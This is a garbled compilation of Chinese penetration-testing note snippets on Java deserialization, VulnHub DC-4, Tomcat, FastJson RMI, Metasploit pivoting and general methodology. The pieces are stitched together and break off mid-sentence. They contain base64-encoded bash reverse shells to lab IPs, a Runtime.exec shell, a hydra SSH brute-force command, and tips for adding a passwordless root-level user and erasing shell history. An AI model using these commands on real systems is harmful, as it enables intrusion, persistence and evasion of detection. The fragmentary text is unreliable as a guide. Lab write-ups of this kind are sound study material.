渗透测试笔记-4

反序列化漏洞 1.序列化和反序列化 2.Java WEB中的序列化与反序列化 2.1 对象序列化和反序列化范例 3.Java中执行系统命令 3.1 重写readObject方法 4. 4.Apache Commons Collentions Apache Commons Collections 是一个扩展了Java标准库里集合类Collection结构的第三方基础库，它提供了很多强有力的数据结构类型并且实现了各种集合工具类 Runtime.getRuntime.exec(“xx”)可以执行系统命令 3.InvokerTransformer的transform()方法可以通过反射链调用Runtime.getRuntime.exec(“xx”)函数来执行系统命令 4. (2)再考察应用的Class Path中是否包含Apache Commons Collections库 　　 (3)生成反序列化的payload 　　 (4)提交我们的payload数据

Vulnhub渗透测试:DC-4

前言 过了许久我终于又写了一篇水文，这个DC-4也没什么技术含量，就当在复习下渗透吧 知识点总结，主要考察了三个知识点： 信息收集 hydra爆破ssh密码 teehee提权 信息收集 ​ ，于是就想着去爆破，但是用户名却不知道是哪些，就进行了盲猜，使用burpsuite测试了test test123 admin 成功爆破出admin的密码！ hydra爆破ssh密码 ​ 经过信息收集我们已经知道存在三个用户，但是在其他两个用户文件里并没有发现有用的信息，接下来对jim的密码来进行爆破 将jim写入到一个文件中，这里我命名为dc4user ,信息收集阶段发现的Old-passwd文件作为dc4pass。 接下来就是用hydra来进行爆破 hydra -L dc4user -P dc4pass 192.168.1.47 ssh 成功得到密码 image.png 使用ssh连接服务器 进去之后查看另外两个文件

渗透测试信息收集技巧(4)——Google Hacking

本文档所提供的信息仅用于教育目的及在获得明确授权的情况下进行渗透测试。任何未经授权使用本文档中技术信息的行为都是严格禁止的，并可能违反《中华人民共和国网络安全法》及相关法律法规。

渗透测试系统学习-Day4

databases; use "库名"; show tables; desc uesr; select 字段名 from 表名; insert into dou_admin value(1,2,3,4,5,6,7,8

渗透测试 | Tomcat渗透

Tomcat渗透 Tomcat任意文件写入(CVE-2017-12615） 影响范围 Apache Tomcat7.0.0-7.0.81（默认配置） 复现 这边我用vulhub sudo service 当开发人员开发完毕时，就会将源码打包给测试人员测试，测试完后若要发布则也会打包成War包进行发布。 ://" target="_blank">

三、更新记录

2004.11.15 V0.9测试版发布，增加了一些基本的功能，文件编辑、复制、 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xOTEvODg4OCAwPiYx}|{base64,-d}|{bash,-i} 最终的 java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NS4xOTEvODg4OCAwPiYx

渗透测试 | 渗透测试之信息收集

渗透测试之信息收集 目录 信息收集 域名信息的收集 公司敏感信息网上搜集 网站指纹识别 整站分析 服务器类型(Linux/Windows) 网站容器(Apache/Nginx/Tomcat/IIS) 脚本类型 aspx) 数据库类型(Mysql/Oracle/Accees/Mqlserver) 主机扫描(Nessus) 端口扫描(nmap) 网站敏感目录和文件 旁站和C段扫描 网站漏洞扫描 信息收集 信息收集对于渗透测试前期来说是非常重要的 接下来，我就给大家整理了一下，渗透测试中常见的一些需要收集的信息。 传送门——> Github搜索语法 网站指纹识别 在渗透测试中，对目标服务器进行指纹识别是相当有必要的，因为只有识别出相应的Web容器或者CMS，才能查找与其相关的漏洞，然后才能进行相应的渗透操作。 对于单独网站的渗透测试，C段扫描意义不大。

VulnHub DC-4 靶机渗透测试笔记

VulnHub DC-4 靶机渗透测试笔记靶机信息• 靶机名称：DC-4• 靶机来源：VulnHub• 目标：获取 root 权限，找到最终 flag• 难度：⭐⭐⭐☆☆（中等）• 涉及技术：信息收集、 | base64 -d | bashURL 编码版本： 1 echo%20YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE2OC4xMjgvNTY3OCAwPiYx %20%7C%20base64%20%2Dd%20%7C%20bashKali 监听： 12 nc -lvnp 5678成功监听到：五、后渗透信息收集5.1 查看基础信息5.2 7.2 查看邮件看一下之前打不开的 mbox：去邮箱里找，之前找到过 exim4 服务：Debian-exim:x:108:112::/var/spool/exim4:/bin/false/var/spool passwd这行意思是添加一个**没有密码、UID 为 0（root权限）**的用户 hack，然后： 123 su hackwhoami # root成功拿到 flag：九、渗透流程总结

渗透测试

SYN/ACK---ACK 3.四次握手 ACK/FIN---ACK---ACK/FIN---ACK 4. blog.51cto.com/414605/760724 wireshark io graph： http://blog.jobbole.com/70929/ 2.metasploit 1.渗透测试 metasploit几乎包含了渗透测试所有的工具，涉及渗透测试7个阶段。 前期交互阶段：与客户讨论并确定渗透测试的范围和目标 情报搜集阶段：采取各种手段搜集被攻击者的有用信息 威胁建模阶段：通过搜集的情报信息, 标识目标系统可能存在的安全隐患 )加载模块、27种(encoder免杀处理用)编码、8种(nops) 溢出攻击：主动溢出和被动溢出（主动攻击获取权限和监听获取权限） 4.

【Web渗透】渗透测试简介

，并以此来规避被恶意攻击者入侵的可能性 基本分类 渗透测试的类型主要有以下三种： 黑盒测试 黑盒测试(Black-box Testing)也被称为外部测试(External Testing)，采用这种方式时渗透测试团队将从一个远程网络位置来评估目标网络基础设施 ，在采用灰盒测试方法的外部渗透测试场景中，渗透测试者也类似地需要从外部逐步渗透进入目标网络，但是他所拥有的目标网络底层拓扑与架构将有助于更好地决策攻击途径与方法，从而达到更好的渗透测试效果 测试流程 PTES )阶段，渗透测试团队与客户组织通过沟通需要对渗透测试的范围、渗透测试的方法、渗透测试的周期以及服务合同细节进行商定，该阶段通常会涉及收集客户需求、准备测试计划、定义测试范围与边界、定义业务目标、项目管理与规划等活动 ，渗透攻击可以利用公开渠道可获取的渗透代码，但一般在实际应用场景中渗透测试者还需要充分地考虑目标系统特性来定制渗透攻击，并需要挫败目标网络与系统中实施的安全防御措施才能成功达成渗透目的，在黑盒测试中，渗透测试者还需要考虑对目标系统检测机制的逃逸 ，从而避免造成目标组织安全响应团队的警觉和发现 后渗透的阶段 后渗透攻击(PostExploitation)整个渗透测试过程中最能够体现渗透测试团队创造力与技术能力的环节、前面的环节可以说都是按部就班地完成非常普遍的目标

socks4代理网络渗透测试实验

实验目的：利用代理功能对2层网络进行渗透 测试靶机 ubantu 192.168.31.207 192.168.1.129 ubantu 192.168.1.100 /elf 成功获得一个会话连接 添加一个路由 run autoroute -s 192.168.1.0/24 本地设置socks4代理 use auxiliary/server/ socks4a set SRVPORT 9999 开启新的终端 编辑 vim /etc/proxychains.conf 将设置的socks4添加进末尾 代理打开firefox 访问 PHP,php3 添加新文章上传php大马 直接拖拽成功上传后，可以查看路径，直接访问地址 由于msf的路由功能不稳定，所以代理得到的会话很不稳定，并且没有重新连接的功能，所以做内网渗透的时候还是尽量使用稳定的代理工具

渗透测试流程包括_渗透测试包含哪些内容

目录 渗透测试步骤 步骤一：明确目标 步骤二：信息收集 步骤三：漏洞探索 步骤四：漏洞验证 步骤五：信息分析 步骤六：获取所需 步骤七：信息整理 步骤八：形成报告 # 流程总结 面试补充说明 渗透测试步骤 渗透测试与入侵的区别： 渗透测试：出于保护的目的，更全面的找出目标的安全隐患。 （是具有破坏性的） 步骤一：明确目标 1、确定范围：规划测试目标的范围，以至于不会出现越界的情况。 2、确定规则：明确说明渗透测试的程度、时间等。 3、确定需求：渗透测试的方向是web应用的漏洞？ ，进行攻击 2、获取内部信息：基础设施（网络连接，vpn，路由，拓扑等） 3、进一步渗透：内网入侵，敏感目标 4、持续性存在：一般我们对客户做渗透不需要，但真实的环境中，我们会做rookit、后门，添加管理账号 整理渗透过程中遇到的各种漏洞，各种脆弱的位置信息 （为了形成报告，形成测试结果使用） 步骤八：形成报告 1、按需整理：按照之前第一步跟客户确定好的范围和需求来整理资料，并将资料形成报告 2、补充介绍：要对漏洞成因

Kali Linux渗透测试技术详解_渗透测试入门

Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. Kali Linux是做渗透测试用的 渗透测试是通过模拟恶意黑客的攻击方法，来评估计算机网络系统安全的一种评估方法，这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。 渗透测试与其他评估方法不同。通常的评估方法是根据已知信息资源或其他被评估对象，去发现所有相关的安全问题。渗透测试是根据已知可利用的安全漏洞，去发现是否存在相应的信息资源。 相比较而言，通常评估方法对评估结果更具有全面性，而渗透测试更注重安全漏洞的严重性。 渗透测试有黑盒和白盒两种测试方法。黑盒测试是指在对基础设施不知情的情况下进行测试。 白盒测试是指在完全了解结构的情况下进行测试。不论测试方法是否相同，渗透测试通常具有两个显著特点： 渗透测试是一个渐进的且逐步深入的过程。 渗透测试是选择不影响业务系统正常运行的攻击方法进行的测试。

drozer 渗透测试_什么是渗透

一、环境准备 1、python27环境，一定要官网下载 python2.7下载地址 2、安卓模拟器（我用的夜深，其他应该也可以），或者一台安卓真机 3、java环境 Java下载地址 4、ADB，​ pyopenssl、Twisted、service_identity pip安装即可，如下： python -m pip install pyopenssl 3、电脑下载drozer，下载链接 4、 6、到这一步安装完成 7、下载drozer-agent.apk，这是安装在测试手机端的，下载地址：drozer-agent下载 可以直接拖到模拟器安装，也可以使用adb安装，参考abd使用 ​ 控制台中要进入到该目录下，再执行命令 3、先使用adb连接手机或者模拟器（因为我用的夜深模拟器，它默认端口是62001，其他模拟器的自行查一下，真机的话用usb连接就可以，进入到调试模式） 4、

渗透测试靶机Lampiao渗透WriteUp

e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA) | 256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4: x20\|_\|"); MAC Address: 00:0C:29:26:BB:D7 (VMware) Device type: general purpose Running: Linux 3.X|4. X OS CPE: cpe:/o:linux:linux_kernel:3cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess

web渗透测试

web渗透测试概述 常见的web安全漏洞 攻击思路 渗透测试思路 暴力破解1 inurl:login.php intitle:登录 intext:登录 Brupsuit常用功能 暴力破解的特点

SCADA渗透测试

渗透测试方法 准备工作 通常，组织很少会把SCADA测试放在QA环境。所以假设必须要对SCADA网络进行实时评估，那我们要考虑所有可能的情况。 渗透测试者需要了解SCADA的作用：有什么关键任务、提供什么功能、最终用户是谁以及他对组织的作用。研究系统文档，对实施的产品和供应商进行自己的研究，挖掘已知产品漏洞，并且在此阶段记录默认口令。 攻击计划 以上阶段应该已经提供了足够的信息让你知道该如何测试以及测试哪些应用。在攻击之前应该记录所有测试的方法步骤，这样在后面测试敏感和脆弱的系统时更有条理。 SCADA渗透测试列表 出厂默认设置是否修改 是否设置了访问PLC的白名单 SCADA网络与其他网络是否隔离 是否可以通过物理方式访问SCADA控制中心 控制机器是否可以访问互联网 SCADA的网络传输是否是明文形式 组织是否遵循严格的密码策略 控制器、工作站以及服务器是否打了最新补丁 是否运行有防病毒软件并且设置应用程序白名单 工具列表 smod（https://github.com/enddo/smod）：Modbus渗透测试框架

windows渗透测试

1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试，并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交； 使用nmap -sV -n 靶机IP flag：Microsoft IIS httpd 5.1 2 .通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测试，将该场景网络连接信息中的 Kali2.0对服务器场景Windows2020进行渗透测试，将该场景中的当前最高账户管理员的密码作为Flag值提交； flag：tsgem2020 4.通过本地PC中渗透测试平台Kali2.0对服务器场景 Windows2020进行渗透测试，将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文件名称作为Flag值提交； kwanqc 5.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020 进行渗透测试，将该场景桌面上111文件夹中唯一一个后缀为.docx文件的文档内容作为Flag值提交； gqzmjh 6.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测试

Linux渗透测试

最近发现了一个不错的靶场，里面各种渗透测试的虚拟机，大家可以下载进行尝试学习。还有就是一个漏洞利用存档，可以找到很多我们可以利用的学习的东西。 nmap -sV -p- -A -O -T4 192.168.0.170 ? 目录扫描 继续对目标进行敏感目录扫描，御剑等工具都可以。 0x03 漏洞利用 经过简单的测试发现http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user处确实注入。 ? ? 附Linux渗透小技巧： bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null Linux添加uid为0的用户 useradd -o -

FastJson渗透测试

整个利用流程如下 1.首先开启HTTP服务器，并将我们的恶意类放在目录下 2.开启恶意RMI服务器 3.攻击者控制url参数为上一步开启的恶意RMI服务器地址 4.恶意RMI服务器返回ReferenceWrapper ReferenceWrapper变成Reference类，然后远程加载并实例化我们的Factory类（即远程加载我们HTTP服务器上的恶意类），在实例化时触发静态代码片段中的恶意代码 2.FastJson渗透总结 4.ldap指轻量级目录服务协议。 >4 然后我们借助marshalsec项目，启动一个RMI服务器，监听9999端口，并制定远程加载类TouchFile.class，这里的ip为你上面开启http服务的ip，我们这里就是kali的ip: 这里我们用dnslog做一个小测试： http://www.dnslog.cn/ ? 直接覆盖原来得文件； "/bin/sh","-c","ping user.'

渗透测试实战

这个过程应该包括但不限于以下几个方面： 信息刺探： 待渗透目标的系统，人员，组织信息等。 漏洞侦测： 所有与待渗透目标相关的系统的漏洞侦测。 下面，是我分享地一个相对完整的渗透实战，仅供大家交流参考，所有的操作在本文公开以前均已恢复，请大家切勿用于非法目的。 一、 信息刺探 作为渗透测试的第一步，也是最重要地一步便是信息刺探。 于是，我们可以使用已经公开的exp(http://avfisher.win/archives/287)对其进行测试， 如下所示： ? ? . : fe80::98f7:e8a:3eeb:ff6%11(首选) IPv4 地址 . . . . . . . . . . . . : 192.168.0.10(首选) 子网掩码 . . . 4. 运行的进程信息 – tasklist ? ? 5. 局域网中公开的文件共享 – net view ? 6. 局域网中的域的信息 – net view /domain ?